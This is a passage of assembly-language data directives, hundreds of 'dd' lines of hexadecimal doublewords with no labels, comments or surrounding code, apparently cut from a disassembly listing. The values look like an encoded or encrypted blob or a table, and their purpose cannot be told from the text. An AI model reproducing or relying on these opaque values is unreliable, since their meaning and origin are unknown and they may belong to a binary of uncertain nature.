		dd 694C77AEh, 0C1C56FA4h, 14A53B82h, 0C36E06DCh, 0F2E5AF4Fh
		dd 26D040C3h, 0A55F8168h, 0D4F3A2C1h, 24628400h, 0B83C40B9h
		dd 3F06F8E7h, 0DE0D0834h, 0EFFC6A8Ah, 1590D3FAh, 9AFD566Eh
		dd 0C1740A60h, 0ED17C5DBh, 763F854h, 0C77D882Eh, 86B85B95h
		dd 0FE6B4E5Fh, 941072C9h, 9B4D54A1h, 46C63908h,	11A61219h
		dd 59B39C1Fh, 40299D28h, 0A028F8FFh, 5D59AA64h,	0DA2D2B35h
		dd 9BE868F2h, 0CA4A2163h, 366C00A9h, 11E2057Bh,	84C54C16h
		dd 72675B46h, 19251389h, 0F58DD560h, 34A027C0h,	0E8DA4B36h
		dd 0D2809590h, 5C907D33h, 0F92D15B5h, 816525B9h, 8059EF2Ch
		dd 92592AE8h, 121E9B63h, 0C771D770h, 0EC701EAFh, 0C810AC9Fh
		dd 0A567CA85h, 8D5C3C8Eh, 92FC03E1h, 0C281EB72h, 22051EAFh
		dd 71ACF752h, 47F75C15h, 0AD140C85h, 0B385F9C5h, 0C8099AADh
		dd 0F8028919h, 6A5516A2h, 0F561BCDAh, 5BE73D00h, 876E2FA0h
		dd 915AE288h, 65E42D74h, 0FFAB3F16h, 5EAA74E8h,	0A9FD781Fh
		dd 5410731h, 0DCE1F86Ah, 0A792ED51h, 44D404A0h,	7F185D01h
		dd 9796F26h, 78CC5F58h,	4173D741h, 8D424A01h, 559BA53Ch
		dd 9B591EA4h, 9422A4C4h, 4CDA08BEh, 84A7171Bh, 250F3626h
		dd 6BE2CD5Ah, 2196C47Eh, 81765C4Ah, 69C48DFBh, 414F8FF0h
		dd 0E18C86EFh, 0B6ABFC8h, 5579B778h, 0EC64AE07h, 4198500Ah
		dd 20CBC101h, 0DF32C051h, 8B9ECC66h, 3AC505F8h,	0E5FE0785h
		dd 0E6CE7479h, 140F5809h, 4AEC3406h, 4F526583h,	7BC22AD4h
		dd 0FEB89246h, 0C74F6AA9h, 40625DDEh, 80DB8D49h, 117157AAh
		dd 0F5CED323h, 7F61ABC8h, 5DF061F7h, 9D532BFFh,	87E23C99h
		dd 6070F93Fh, 0C337B5F6h, 7635C2FAh, 4DCD95D8h,	2D376537h
		dd 5627FA23h, 8DC20FC3h, 0C09980D1h, 0F419F4FFh, 0EFB852C5h
		dd 22AF9CD0h, 4D3249Eh,	4875BA5h, 87DF0FF4h, 73A19BAFh
		dd 70808504h, 5347B2D6h, 6BF483A9h, 0BF4BF2A0h,	0BFA65C2Dh
		dd 7BD4DDF4h, 3B407B1h,	69632FB2h, 81F4996Dh, 0D1F27211h
		dd 5AF2550Ah, 0DB7C2D68h, 0E114713Fh, 7FBAA4CDh, 0B535B479h
		dd 48CFAA2Bh, 1FEAD0ACh, 85097A38h, 0A53E458Bh,	119287E0h
		dd 0F6260170h, 594454F9h, 1142055Ah, 0C8ABCDF1h, 189E3E27h
		dd 3F8AD5Eh, 0FE55877Bh, 0B167B613h, 971700B7h,	9273131Bh
		dd 8E4E7182h, 56ED38F6h, 40D3CD4Dh, 13F0C7AAh, 579781D2h
		dd 0AD186B33h, 0CD12C628h, 0D8BF3B6Bh, 0AD1143AAh, 65E18014h
		dd 2A25E6Fh, 4151F89Ah,	0F441E0E3h, 0B0A9B47Bh,	2A0DCF96h
		dd 2638BA74h, 696BA566h, 0F6BE5512h, 27B3DB2Dh,	0FC292A1Dh
		dd 0CAA07C4h, 0EF76E47Fh, 0A9703A5Fh, 0F57B2386h, 45A2D7C3h
		dd 0C296472Eh, 46019B57h, 0F9253DBAh, 0D847019Ch, 0C92A5704h
		dd 0CCEF383h, 3605A131h, 68FA818Eh, 0FD8F0FC7h,	0B6F00390h
		dd 0BCF756C3h, 895F4C41h, 92E82C59h, 1EDFA3F1h,	2045F86Eh
		dd 0CDB4BF02h, 0E88F6C26h, 0C2F6F528h, 0BC7DFF3Bh, 24716D83h
		dd 0F86D208Dh, 0D82E2DC0h, 5A256760h, 0B66FF7CFh, 6774F816h
		dd 7D8A6D89h, 0F4ACC4C1h, 31ECCA69h, 0DB06D154h, 0EE39B4EDh
		dd 4F0A139Eh, 0E6BDA62Ch, 932ED178h, 0E904496h,	92698CE6h
		dd 0EF92E8FEh, 9B9DC1ABh, 6E1ECE2Ch, 6ACA50D8h,	704F7DA5h
		dd 0DF0168A7h, 1D811B42h, 24F1C626h, 7F0CECC4h,	8FB27A39h
		dd 0C1393353h, 45F261DAh, 73DE135Bh, 8561343Ch,	0AF78A607h
		dd 41D3ECE7h, 38DB52EAh, 7E1E8F38h, 4A1AA4FFh, 0B9726A44h
		dd 131C0EB3h, 0B1929466h, 3F6F6C28h, 625CAAFCh,	54745FDh
		dd 322B380Ah, 129BDBBFh, 769D9D78h, 4BFB522h, 31C20EFh
		dd 3C70BCDh, 0B3307633h, 0F408E4C4h, 7319981Fh,	5A550B63h
		dd 0FF5A7545h, 140F7B44h, 9B96CC9Eh, 0F83CEF6Fh, 9758F1A5h
		dd 6C26D605h, 0A014A143h, 0B9CE4E6Fh, 6527FEBBh, 5440098Dh
		dd 7805E7BFh, 0FBB96F7Ch, 0A22A3FA4h, 0F399DE08h, 0FA293290h
		dd 0A3DC01ECh, 1B6AB37Fh, 693D9B45h, 5F69E1A2h,	0E63953Ch
		dd 8F6FF371h, 4C7C31DBh, 0F6D027E3h, 93056CBCh,	0E55DFADCh
		dd 60789C22h, 9FB1CDCEh, 82E8782Eh, 0C66A48EAh,	75252217h
		dd 787FE4Eh, 51160097h,	0D5150259h, 11822CBDh, 1ACC85A5h
		dd 12E18F04h, 0FD10503Dh, 5C70FD3Eh, 9E1795BBh,	0AEC03EA8h
		dd 73331123h, 3059FE60h, 0A2E1A25Ah, 407BF94Fh,	938BDBA0h
		dd 255EB563h, 0A57BE6D7h, 0B2FCC0F9h, 8685727Eh, 66246BEAh
		dd 452FF822h, 6DC1563Fh, 0E52D33A6h, 5AC09628h,	95E9FD25h
		dd 8E46F03Ch, 24468567h, 30FCC373h, 0EFD6D4A7h,	496AD898h
		dd 10231C59h, 0AC05640Bh, 69BF58D5h, 0CC29400Fh, 0E079DAF2h
		dd 69DC0BE9h, 8703590Fh, 722A74CFh, 234332Bh, 6860897Ah
		dd 0F3AF5F0h, 0E4AE98FCh, 5E65DB5Bh, 89831792h,	82E666FBh
		dd 26E9030Eh, 570F812Dh, 7F0EE75Ah, 260CC545h, 60E56FA5h
		dd 0E249A701h, 46AFC8F9h, 51FBAD9Fh, 40925FEh, 37AB2CDEh
		dd 0CCE211DFh, 0FDE2EDEh, 0D008630Ah, 744BAED4h, 9DC57E87h
		dd 7AB17C90h, 26261AE9h, 0F0D0AB1Ch, 0A7150B40h, 48D456D0h
		dd 88D7CAD0h, 0CDACAA16h, 6E457FB1h, 0DE76022Dh, 998DBEA8h
		dd 5D30FC91h, 3A87D754h, 0D39CB03Ch, 0BC642D78h, 6760C16Eh
		dd 588A5408h, 0F37F98ADh, 0B6B2211Bh, 22339788h, 59C14D8Bh
		dd 0B87E1F85h, 6407ABF1h, 0AB833A0Dh, 0F3A7891Fh, 7A85E885h
		dd 0CEC2FA2Eh, 68372DFEh, 5903703Fh, 116A92B9h,	16E89F42h
		dd 0F60F461Ch, 5298331Ah, 8C0C8118h, 0D56AF602h, 0D173D35Ah
		dd 2320ED7Ah, 0DDB5E0F2h, 0AF62E336h, 6E535534h, 0A7D6AAEh
		dd 41893E00h, 94F414CBh, 568C96F3h, 27B72955h, 0A3D56522h
		dd 5DAB2C05h, 0AFC1ECF7h, 0E1445038h, 0F7EDBD2h, 6A9556FEh
		dd 5A2255EBh, 0DCF91EA9h, 0A3647A49h, 0F0607A84h, 0FABE3DD1h
		dd 4852FF5Fh, 287E15E0h, 0F6E81701h, 353A8DEEh,	424157F3h
		dd 66C0D070h, 1EEF37ADh, 0C6AA4E3Dh, 1D3A64Ah, 0C5670725h
		dd 368B2B3Fh, 0CD6CAA8Dh, 6901EDEh, 27FBB028h, 0C5978BFAh
		dd 0A7508BD8h, 4A73B448h, 0B8BFBCAEh, 0FC4F1EACh, 30A17514h
		dd 0C005F493h, 6B81E1DBh, 0F74EFC4Ah, 0B38E37C2h, 0D9FBB820h
		dd 0BF31B4B5h, 0F79EF121h, 1A78B0E0h, 919B04ADh, 1465C7A7h
		dd 22CBFBE0h, 775A15E4h, 0C2882F86h, 865B8CCFh,	0B661DB9Dh
		dd 0C5716AECh, 38A3A39h, 0E4ED791Ch, 53E8E361h,	62FFED1h
		dd 0E8A8ED81h, 605BA771h, 8545DAF9h, 0A55B2DD2h, 0FF7E0A66h
		dd 9FED72ABh, 0A8808E07h, 1673B5D3h, 0A9CBC253h, 4E328F83h
		dd 4C579AAh, 20F6ACA4h,	451782E2h, 181E2A4Bh, 27387AA2h
		dd 0C7DA9FDAh, 335E50C6h, 0AA6FB836h, 0BFD1B879h, 5ED19C45h
		dd 0E7F11BE5h, 86E3FDB4h, 0E4976E89h, 22D31328h, 9654FBFEh
		dd 0DF498EE8h, 28F4AA9Bh, 646E2915h, 0C643F578h, 27D60229h
		dd 17750F07h, 42DF26ADh, 691F17A4h, 32230C8Bh, 0AF486866h
		dd 899FC1E1h, 386FD7FBh, 0E3855477h, 0BB591F84h, 0D07BC42Fh
		dd 4C0F5D2Bh, 3A9F66FFh, 0F1AFD773h, 1501DACBh,	25869B0Ah
		dd 97976AA4h, 3B8192D7h, 5F5619CFh, 1198ACD3h, 0B5FCA641h
		dd 51FA47ABh, 20A45C17h, 144A1AEh, 6D056F65h, 4F75A162h
		dd 5F6723Eh, 5C0F6217h,	2F61BA13h, 0B8416552h, 8A5C57B0h
		dd 55D32AD6h, 682AFFCEh, 0FA392498h, 5E77678Bh,	40DB22Fh
		dd 1AA98276h, 903E3C68h
		dd 0BDA18864h, 0D59A680Eh, 0B2141376h, 7364F579h, 9D440817h
		dd 0E0E60610h, 0B04E9B10h, 3BFD1554h, 2C5C64B9h, 462EF4F2h
		dd 0E9DA98DAh, 0CC947DF7h, 0CE052E70h, 0C1B02E37h, 0B3EB988Ch
		dd 0D7488FBEh, 833425C3h, 0A4ACA575h, 3872F9A7h, 4D7626D0h
		dd 45F8A90Ah, 6C7A2527h, 80823F0Fh, 0D2814989h,	0C3AB8C16h
		dd 7A8BFD24h, 6880382Eh, 50F8CE90h, 0A2B2C2FDh,	0BB12E381h
		dd 0F5C93392h, 1F15712Ch, 52175EC5h, 52090C5Ch,	43A13332h
		dd 0E02681FDh, 42B4361Bh, 0C52746F4h, 14A54B17h, 5321588Ch
		dd 45ECCF0Ah, 168A7781h, 50C5FDE9h, 0B13C4C39h,	7A1922F2h
		dd 96C5C3FBh, 2E991747h, 82A9FE31h, 0AAF56FAh, 1EFCAE3Ah
		dd 0D014096Fh, 3B03AA7Fh, 0C46B49BCh, 2E36CBDFh, 4A863410h
		dd 0B96E3C92h, 0D68F27A0h, 86128F1Ch, 2AC40F7Eh, 0A77E5C9Dh
		dd 0FAA0055Bh, 0E7C1B540h, 0B892413Bh, 0DB467778h, 0AC029B01h
		dd 0AE07DA66h, 8245946Fh, 3190E111h, 8FDB34Ah, 9651A51Bh
		dd 0E9AC3357h, 0ED4F28C7h, 0DFD7B3ACh, 10FD3968h, 0EE60B695h
		dd 0C417B1A8h, 5C7CE631h, 0AFDD6179h, 2F870F60h, 5E7359Eh
		dd 10A1EAA9h, 0FDCC7079h, 0D8130DE9h, 4EF7F8A2h, 32FB38ADh
		dd 62412C07h, 87ECA2E5h, 73086D92h, 0E6B6568Ch,	18CCA25Dh
		dd 6A298C97h, 0D2573643h, 3804F253h, 37B29322h,	0DAB1AABDh
		dd 2767C52Bh, 69C162A2h, 0E064B3EFh, 5015A338h,	0ECCA9504h
		dd 58A78B6Ch, 0DF2A186h, 1ABB802Bh, 5F3360EDh, 89F15593h
		dd 9290E478h, 0ACDAD8Dh, 3C0F4870h, 8EFFB9Ch, 0DAA57701h
		dd 5054F21Ch, 0A2E0503Fh, 1554EF67h, 6BF2D325h,	5C122BA1h
		dd 17482DC2h, 0DFB0BCF2h, 0FDD29694h, 0E8F03C9Ch, 2FFBD3E7h
		dd 0C5185483h, 4CAB5A74h, 442D9626h, 7E445290h,	6B099C4Eh
		dd 0DC7DBFE2h, 17949176h, 0B70EB80Bh, 62D09A76h, 66B81025h
		dd 9FECFC67h, 0EE22E89Ch, 50789544h, 0E57EF398h, 62B38DFAh
		dd 0DDC7A89Fh, 0F3D45D07h, 1AAC2F03h, 0CF22E4F5h, 0F0283F1Ch
		dd 9543550Fh, 0D246D27Fh, 5C21E35h, 88C0AFEAh, 20FB05BBh
		dd 0F512546Bh, 0EEFFCEE1h, 2DAACB0Ch, 79AD9957h, 0AA51AE0Ah
		dd 0F5C12F38h, 0A314284Ah, 1E49B3BEh, 0F9DDE77Ah, 56C0B710h
		dd 61240641h, 10689EEBh, 0D1ADDE17h, 68970F0Dh,	0C4E232AAh
		dd 148AAC94h, 0C82B9B29h, 8FD4EB26h, 0C7279CEDh, 766C8CFCh
		dd 4BF556B4h, 438DBFD8h, 0FDA8BDF7h, 0BFA01CC0h, 4F5B1A6Dh
		dd 0A7938DFAh, 5A847589h, 74C9C541h, 0ED4A51C7h, 0F5A24C38h
		dd 59B42ACCh, 917A373h,	0B2915F0Ch, 66B00A40h, 0CE83E882h
		dd 8B015145h, 0F9555BD3h, 296286DFh, 79C2B435h,	22B9E1D3h
		dd 7216EB25h, 0A5B14D3Ah, 17E08AC9h, 0B36F9028h, 3FABA146h
		dd 599F9370h, 2A96F910h, 53B7CBABh, 0A0C817A9h,	7B228915h
		dd 4675E3AEh, 0E3EF9527h, 9E8D502Bh, 0AC5EE165h, 550A1E4Bh
		dd 0E1453BC0h, 0EB02194Eh, 3C20C347h, 999608DFh, 6AC33696h
		dd 128918BFh, 9FDF4DC9h, 0A368AE7Bh, 2FB4F6C6h,	149F8C5Eh
		dd 9AA49578h, 5A9F7C6Bh, 0C278210Ah, 599ABD46h,	66F333B2h
		dd 92238808h, 6172F7C5h, 9804C7A2h, 0C115125Bh,	0CDD31F70h
		dd 0B4BC6E82h, 2032512Dh, 257D66EDh, 0C13AE02Eh, 2184B302h
		dd 63CAA0h, 0AF5BC8F3h,	6419EEF8h, 816D30CAh, 624C2812h
		dd 3D3F26C2h, 7374E670h, 2944171Eh, 3D71750Fh, 6CBFF17Ch
		dd 85F745C3h, 0E1E84DC0h, 0CA9F44C2h, 35878297h, 0B467BE7Bh
		dd 0E875DD53h, 8D5D3634h, 0B1F16DB6h, 94CD9720h, 7AFFF38Eh
		dd 0F2E44A4Ah, 0DB5AB0A9h, 0DEAC9D6Fh, 1E813752h, 55175D79h
		dd 0F6C7AACEh, 1B2695C1h, 0B6E57171h, 411E3E0Ah, 3F7E83E2h
		dd 0BDBF0EADh, 0B2CA0CD7h, 3EEE5E88h, 6F50101Ch, 0D46D669Dh
		dd 0C8C069BFh, 0FFA01A1Ch, 0C45AFC44h, 4A0FDBBFh, 0D8E638D4h
		dd 0B2D2159h, 0C4BDEF65h, 0A2A1182Ch, 11CE0571h, 0B95AF2EDh
		dd 5465FD4Fh, 3ABF99C5h, 0B8FD6FD4h, 0ACAC989Eh, 31256556h
		dd 0A15EB767h, 43040A0Eh, 293C1DE9h, 9A02FCCEh,	0A976C416h
		dd 15EF2747h, 0ADFAECADh, 20E14706h, 5F8AE2F0h,	0DA1F73E1h
		dd 0C7DD2ECFh, 51F8818Bh, 7B1A6976h, 0B24EFCD1h, 4ACD90B1h
		dd 0B054D4FCh, 560C7787h, 9E721BBAh, 2FF1097Fh,	2F72DB69h
		dd 576D950h, 0DCD0095Fh, 0DC1029A9h, 5E0BDCF0h,	6C5C3DEBh
		dd 1750B19Bh, 1A9556E9h, 0D37FA42Fh, 0BCD6F60Ah, 59889689h
		dd 0AFF483A1h, 3CCAF86Eh, 17240F50h, 4EAC35CBh,	0B076E979h
		dd 79792E1Ch, 533B6E29h, 0D7FDEF55h, 0E95A2C88h, 5E3563D5h
		dd 4E44E13Ah, 0EE7849A3h, 9C7C7746h, 545D53B3h,	47A62FE1h
		dd 9043216Ah, 0FE020B85h, 2C9A1785h, 9A4D0BA8h,	0A97268FAh
		dd 0A8705CADh, 6C0962E8h, 0E6837851h, 5EDB4C9Eh, 2289CE76h
		dd 0D41D8792h, 0C7EDBB0h, 0F221B58h, 82411B8Ch,	31FBED2Ah
		dd 7C579615h, 0F03C5074h, 331FB967h, 0D0C0A979h, 6D119104h
		dd 48346864h, 66FA7C03h, 6B921A82h, 0EB385C43h,	437F3438h
		dd 2AAF8BA5h, 88A288C4h, 0E049DAC9h, 267F9D07h,	881EEE7Dh
		dd 7A8E5DC5h, 0FF757D08h, 0C7F10C2Eh, 428B0FC4h, 2DCEF010h
		dd 0A6425950h, 0A893E108h, 9D2508A9h, 24F70A22h, 0AAA81FAEh
		dd 0CF8357D2h, 0E07B35C1h, 2CF54EFBh, 0F63E0F59h, 0A82E44E3h
		dd 0C13961EFh, 0A00ED92Dh, 0A04EC8DBh, 1DA090C6h, 861B694Eh
		dd 0F289A7B2h, 573B57E9h, 0DF76895Ah, 0FAA79404h, 7DF94DCAh
		dd 0DF076896h, 3853577Ah, 0FDC886A0h, 7582DB9Bh, 5D1A8196h
		dd 9F33A961h, 9629EAA7h, 0DB880B77h, 23D05DD5h,	6ABDAB5Ah
		dd 4EF63ECFh, 8DCA81E7h, 0B2A0AEA5h, 8E3D8A6Ch,	3BF3DB8Eh
		dd 39B9905Ah, 5723B5D2h, 0BC946AC6h, 2204C13Eh,	9A355CBBh
		dd 9D0F5124h, 3C614C5h,	0CCE72CB6h, 1A1C281h, 312AACA4h
		dd 0B277FC83h, 9C29DF62h, 85421B79h, 0CFEF374Ch, 2955C953h
		dd 65379A49h, 859C9770h, 3D0A9F60h, 97D960B0h, 337F7D26h
		dd 8277B44Dh, 0FB63AB52h, 0C6112F7Eh, 0A892D7C9h, 1365665h
		dd 0F2C553CEh, 0C4FDA7B4h, 0C55252C4h, 0A201581Eh, 6A225F22h
		dd 2F04ACC2h, 52F5E7Eh,	0F56D9354h, 0AE9D92EDh,	68207115h
		dd 174CF101h, 2D1ADD47h, 958C9244h, 6EA9BE9Ah, 4E1F6E8Eh
		dd 6D69458Ah, 5AFC4332h, 0D6E5ACEEh, 0D652863Ah, 89D0AFAFh
		dd 42A1494Eh, 6C691596h, 0EA7BF83Ch, 51BA6356h,	17394522h
		dd 0DAE6A1EAh, 0B12D855Bh, 6BDE79D4h, 3E3B9830h, 857E63B0h
		dd 0DC4B4E0Ah, 87AC0C1Ch, 15EA83EEh, 0C2C0EE55h, 0B05D8247h
		dd 0EFC5F8BBh, 2FAEE46Fh, 6AE5814Dh, 0A4B7E2D2h, 65897D90h
		dd 50BBF9A2h, 696B737Dh, 99DF4DE0h, 0CBDD9FCAh,	61FB9706h
		dd 0FD59362h, 0EFB9DFC4h, 0DB76673Dh, 0C29F6022h, 0DE45D549h
		dd 0E556E44Ah, 7DA21289h, 51A92F4Eh, 0C114C761h, 0E039A970h
		dd 242CC3D5h, 0BB1AD5D1h, 57C310F6h, 282B97C6h,	0CDE7379Dh
		dd 93889C93h, 3AC5A88h,	81EB3D2Ch, 796E061Bh, 0C8A3C4A5h
		dd 9CD67834h, 5A3D5689h, 891D8A19h, 0CB8A22B6h,	4E043F0Ah
		dd 9517397Ch, 0BF46F4ECh, 0D2A4D138h, 14460CAh,	31309B77h
		dd 85C68DCCh, 915358E7h, 98AFB9C1h, 8D310F35h, 80194211h
		dd 8BCF592Ch, 0EEAE6B56h, 0EBBC1440h, 0F037F779h, 95A34C27h
		dd 56F2288h, 0B181CB21h, 667CF5E7h, 0EDDCF8CFh,	1C267A54h
		dd 742A59AFh, 5D19948Ch, 0EE7AF68Fh, 84704A50h,	61E5041Eh
		dd 9812BF50h, 0BC5B4573h
		dd 851EBB1Ch, 88B9CA5Fh, 0DA408973h, 0FD15DCD1h, 172110E2h
		dd 5C2F0915h, 0ABA168EAh, 0A1CBB196h, 0D6888333h, 3983AA13h
		dd 90FAB71Fh, 0FED652CAh, 249D3E17h, 0F0F0E349h, 0F4A75D9Ah
		dd 0C4F9CAF3h, 0BED2E806h, 28DA6D1Dh, 1ABDE69h,	0ACC062E2h
		dd 0FA9E7EF0h, 0F73A42ABh, 0AA11016h, 9FD24B79h, 0B76ABB18h
		dd 5745A0CBh, 51185A22h, 0BBD4041Bh, 939A87E2h,	0DBEE454Ch
		dd 3B58EE11h, 0BED9CBF2h, 9167FE2Dh, 6A6B692Ah,	0DE41F5F6h
		dd 964C3F25h, 0D6852AAFh, 46DE6A27h, 0E18AFC01h, 0B7126B83h
		dd 0C671ABD2h, 8B6550Fh, 3B7CE98Bh, 3DAB437Bh, 39AE1AA8h
		dd 0D1C4493h, 5D07B0B6h, 9C236A62h, 6BE6BE58h, 0B76F0176h
		dd 0EAB45A92h, 4B2AD7EBh, 0B20BA8F1h, 1848B888h, 0E7B87097h
		dd 4CD332D0h, 5735E38h,	91FDA715h, 0F80A18CCh, 76127421h
		dd 0A9E97F91h, 567DBFDEh, 0EFE0CC6Eh, 0E01D0144h, 1A70B130h
		dd 1436AC6Dh, 3A33C93Fh, 32E909DCh, 778A73EAh, 0D67BEF53h
		dd 0A9E89BD5h, 9E8E6894h, 0D3F5695h, 0CDE9EF5Eh, 0D2FF2FEBh
		dd 78DB332h, 433C3C6Fh,	0D53E01B4h, 532BEDB4h, 817F8E04h
		dd 0E1D3F56Dh, 0F945163Fh, 0FA6ACD97h, 0E6FB251Ch, 4A65F1E5h
		dd 4A83FC34h, 0F33C5838h, 0E59ADB8h, 0A7FA7D2Ch, 7E45F008h
		dd 9F1520A3h, 0B15665B8h, 0D7A54966h, 4947A000h, 7D2F761Ah
		dd 14FE9A89h, 3035C3C4h, 0F227FCB1h, 4C4B0FCEh,	0A366FB1Fh
		dd 14276EA1h, 0FC4BF2Ah, 68359B55h, 834D633Ah, 9AB87951h
		dd 0B9AA28EAh, 0EDFC751Ah, 81CB74F4h, 6EDD8E1Fh, 1E1D6983h
		dd 783DC509h, 0CED71415h, 30F5C51Fh, 8BFBF00Dh,	52E45166h
		dd 898738D4h, 5ECA719Ch, 7A6A01D9h, 3EAB6094h, 9791E68h
		dd 454C9ECEh, 2A5824CBh, 8CD5AF54h, 0EBFABE8Ah,	8495A379h
		dd 8BC1C681h, 155B561Fh, 0C1DC7944h, 0FED6DCC4h, 689F300Fh
		dd 0B5DC0337h, 6F66EB17h, 3B31B215h, 0A064A9DAh, 98198832h
		dd 9DBEB77h, 2E306655h,	28BA87C1h, 40E22E56h, 0F5120F68h
		dd 0E3F1FBF5h, 0FBB60AAEh, 91F0A52Fh, 0F1636679h, 0B0EEA585h
		dd 0E3F77D07h, 0F0CD462Fh, 0BC053581h, 0E855B765h, 3E6F83Fh
		dd 13751319h, 614D8107h, 12C4FB68h, 3D8394DFh, 46CACBF0h
		dd 95E250FAh, 48B9618Dh, 2AC51F10h, 6260FE36h, 4E86AA93h
		dd 7DA8C0EBh, 397F1EE4h, 0FF6FBB39h, 38554642h,	6CEABF28h
		dd 2C1A3925h, 0CDBD141Eh, 4FDE806Dh, 0ACEF00AFh, 66EB944Bh
		dd 7AD14F15h, 0EC776BCFh, 71CE0384h, 1B55AD18h,	55B07EBFh
		dd 67270088h, 3DF62C20h, 27946FF1h, 0FE5FC02Eh,	40955F8Eh
		dd 6141F7E0h, 0B229A09Bh, 0BA800483h, 53DC4E9Ah, 0BA7622AEh
		dd 98ECE3EDh, 58E7246Fh, 8EA9A6BEh, 0C643768Bh,	0AB6A4B46h
		dd 0BBC4CDC9h, 5F590BB5h, 973BD827h, 70B5BDA6h,	3F13B4F6h
		dd 394D65FFh, 2FAE35CFh, 0FF3F79D5h, 7D1507CEh,	3C5CF72Dh
		dd 7B4DE85Bh, 68FF7235h, 0AB1BAC9h, 964E5664h, 839A4D41h
		dd 0ED18FA22h, 8FE1B6F0h, 4EB95998h, 0E75FA08h,	8D537F6Fh
		dd 9965523Dh, 0CF931D07h, 0FF66A303h, 0BBBE51EDh, 71A9C33Ah
		dd 21E6A425h, 16B5960Eh, 9722B2F9h, 500A6EE1h, 60694B6Eh
		dd 0A6717B5Dh, 3B5CCC2h, 0A36531Ch, 0A4C8D907h,	6581B095h
		dd 22C4354Ah, 3CB58647h, 8B59C078h, 0FC07597Ah,	0D3C57870h
		dd 7DD4CE72h, 90725439h, 0D909F071h, 4ABB2B2Bh,	0E4CAC43Ah
		dd 4FE54FDFh, 0C24D8364h, 217BF7E3h, 4EC6771h, 990A66B7h
		dd 8159662Fh, 0C2841B6Ch, 9502F625h, 0F31E2E54h, 52F79C15h
		dd 5DFB578Ah, 656B4FB4h, 0E9745DBAh, 32FE03C2h,	0E747E818h
		dd 0F2A0ACC6h, 97A52E2Fh, 0BD78DFAAh, 0F2B7274Bh, 3324E06h
		dd 0A9686D22h, 156D3F5Bh, 0F7197C5h, 0E9F292B9h, 0A08C723Bh
		dd 82E7E435h, 17F31C68h, 0F10F17ECh, 8D0B502Ah,	0CA4BAF07h
		dd 1F9253CCh, 9AC77D2Bh, 910C1A91h, 0F1BC43CDh,	8145DD24h
		dd 35DB0BE4h, 0D03F1BD7h, 0C26B5277h, 0D33D86Ah, 654F0F97h
		dd 56DBF323h, 0FE65581h, 7837AF0Ah, 0A9A2C85Bh,	0E677AE54h
		dd 9C258F0Eh, 0CF7EE3D7h, 7A590903h, 333CA2AFh,	5A72A139h
		dd 40BB2165h, 7A9624A7h, 4CFE5464h, 179AADEDh, 405E70FCh
		dd 986D6CEAh, 1882923Dh, 0A5F619D0h, 48C4D991h,	1EF53752h
		dd 875B9470h, 0F2B4D6C3h, 0B732D070h, 0C2E42ED3h, 4181E38Dh
		dd 0DF9F7FA0h, 1BF89C53h, 36C1AC24h, 0C438D14Dh, 5EA41CC6h
		dd 733EA05Fh, 0F8F662E0h, 6691E860h, 184B21B5h,	3DD2FC4h
		dd 52D459B8h, 99A55FA1h, 855BA82Fh, 3F66E288h, 755116BDh
		dd 0DF956C58h, 7745AA89h, 0F0DD6342h, 0D709F843h, 0E1E54B73h
		dd 169C12D6h, 0C7D5BEDh, 9FEBBD4Ch, 512A9AE7h, 0CB44D4B3h
		dd 0B1E375A4h, 95E75E7Eh, 33896225h, 0F3174976h, 0A36846ECh
		dd 73FB4C42h, 10D5C17Ch, 11159572h, 0C4A3E1EAh,	30A20342h
		dd 90281230h, 0FF8EF1BCh, 1D4B18CAh, 0E380F82Dh, 0E9EAACD8h
		dd 3F5CA557h, 0D4889217h, 0BE2CBCEEh, 0AF443812h, 747EDE32h
		dd 0E4446128h, 5B82A1C1h, 2DF97130h, 4F75BD14h,	0B61F7123h
		dd 0ABDE5EB6h, 0A117CF6Ah, 743BB463h, 0D12BE7F9h, 6FCD478Ch
		dd 3B22D238h, 6FA3F0EEh, 0B9ECD6CDh, 33362191h,	0CAB2234Ah
		dd 9F52816Ch, 0B016283Dh, 0EAB8BB4Eh, 6EBEEB60h, 4B7B54D7h
		dd 9EAC04FCh, 342BA1Eh,	89FFE773h, 9899B928h, 3B46F16Dh
		dd 0C386D821h, 17AE1687h, 0F6102B61h, 0FE1A7FE2h, 0D751157Fh
		dd 8BDBE0AEh, 9D3FAA3Fh, 0F1D4615h, 0AC7121ADh,	75EEE647h
		dd 0D8B366C6h, 40ADDEF0h, 0EA8114A8h, 0A135111Bh, 2BCA6D24h
		dd 8EA16279h, 0ED7E6B58h, 0CC22B6CBh, 5FB5DDB1h, 0E837A1FAh
		dd 68E47454h, 14BA06AFh, 0C12947A6h, 0C4B7F818h, 0C501381Eh
		dd 380E735Bh, 0B86C6ECAh, 381FD70Ch, 596EFD6Dh,	0F7DD1752h
		dd 2B3CAD17h, 5F9F73FCh, 1C683F19h, 0A4DABB1Dh,	53097604h
		dd 0C5155F21h, 0D7F329B5h, 0F1E48E55h, 34A64B2Fh, 0F9C5486Fh
		dd 0C1DBDFAAh, 9EBB244Bh, 79699707h, 0F1190F54h, 5F0B9F51h
		dd 0C9CDD1D3h, 0AACB8BE2h, 354C802Eh, 4E4528A0h, 0EA0AB083h
		dd 9F2A6474h, 6500776h,	436B9453h, 0D578FF2Fh, 468BFBF1h
		dd 690C05Bh, 0C9697EDBh, 0AB547C8Ah, 0E0C90BF5h, 0C051216Bh
		dd 0E1048293h, 1F850E95h, 80ED5652h, 9CC7EEBEh,	0A04078A8h
		dd 4A3560FEh, 359E63Ah,	44CBDA69h, 6BF29CADh, 0D9629976h
		dd 3E55176Bh, 0E99D562Eh, 987E9A72h, 0CB7776A9h, 3C2A500Eh
		dd 0D3F96BE7h, 9B6830DAh, 4C2A7484h, 0E2D455B5h, 0BF09C843h
		dd 203E4AFCh, 0C0A9D3AFh, 0B5CBD267h, 0CA1D15C0h, 0E2294FE8h
		dd 0BE141CE8h, 93012DF6h, 9B0F4EB5h, 0D22AEC4Fh, 2B8E3916h
		dd 0D17EA2CFh, 1E5CD3B9h, 0EDCB631Ch, 0FB7B4303h, 9642FCA3h
		dd 0F9E41FCh, 67C41EAEh, 88A84FDFh, 4A60A6A9h, 7FB4C6Fh
		dd 0D0509F3Bh, 0ACAB3CA8h, 4B4F1BB5h, 35518B27h, 0EC76ECCDh
		dd 0F49478C4h, 4D55C243h, 0B573DA0Ah, 844A19D0h, 0E1FDEFC2h
		dd 43F027CFh, 0FB8E22C1h, 2950D31Eh, 5DEC270Bh,	463BE4EDh
		dd 0FA215A83h, 0B6ABF9D0h, 0FA19E7Eh, 0B94A4824h, 0FDEB2984h
		dd 0FBB9450Bh, 0F40AD6CAh, 6B45DC2Fh, 45C07C30h, 54D9AA37h
